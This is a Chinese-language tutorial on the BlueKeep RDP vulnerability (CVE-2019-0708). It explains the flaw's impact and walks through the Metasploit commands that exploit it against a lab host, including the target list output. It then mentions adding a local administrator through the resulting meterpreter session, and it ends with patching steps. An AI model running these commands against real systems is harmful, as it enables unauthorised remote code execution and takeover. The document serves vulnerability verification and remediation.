CVE-2019-0708 Microsoft RDP RCE漏洞验证及修复方法

CVE-2019-0708 Microsoft RDP RCE漏洞验证及修复方法

一、简介及漏洞危害

  Windows被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

1、影响范围

2Nessus检测出有漏洞的主机

二、准备攻击利用

1、使用Kali Linux,启动MSF

 

# msfconsole

然后在Kali终端输入命令msfconsole以启动msf,如图所示:

 

2、开始攻击利用

接下来就可以开始进行目标机的攻击了

分别输入命令:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.26.127
set target 2
exploit


解释:

其中rhosts为目标机IP,target设置为2,可用show targets 查看对应ID,exploit表示开始攻击。

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name
— —-
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – QEMU/KVM)

利用过程截图

3、攻击利用成功

返回 meterpreter > 提示,说明已经攻击利用成功,可以查看IP、文件,或利用net user 添加本地管理员权限,使用RDP登录,以前其它操作。

 

三、漏洞修复:

1、使用系统自带的windows update补丁更新服务,更新微软漏洞补丁(慢);
2、使用360 、腾讯管家等工具修复漏洞(建议);

如长期未更新过,可能需要更新完、重启、再更新、再重启,操作多次,因为有些补丁有依赖关系。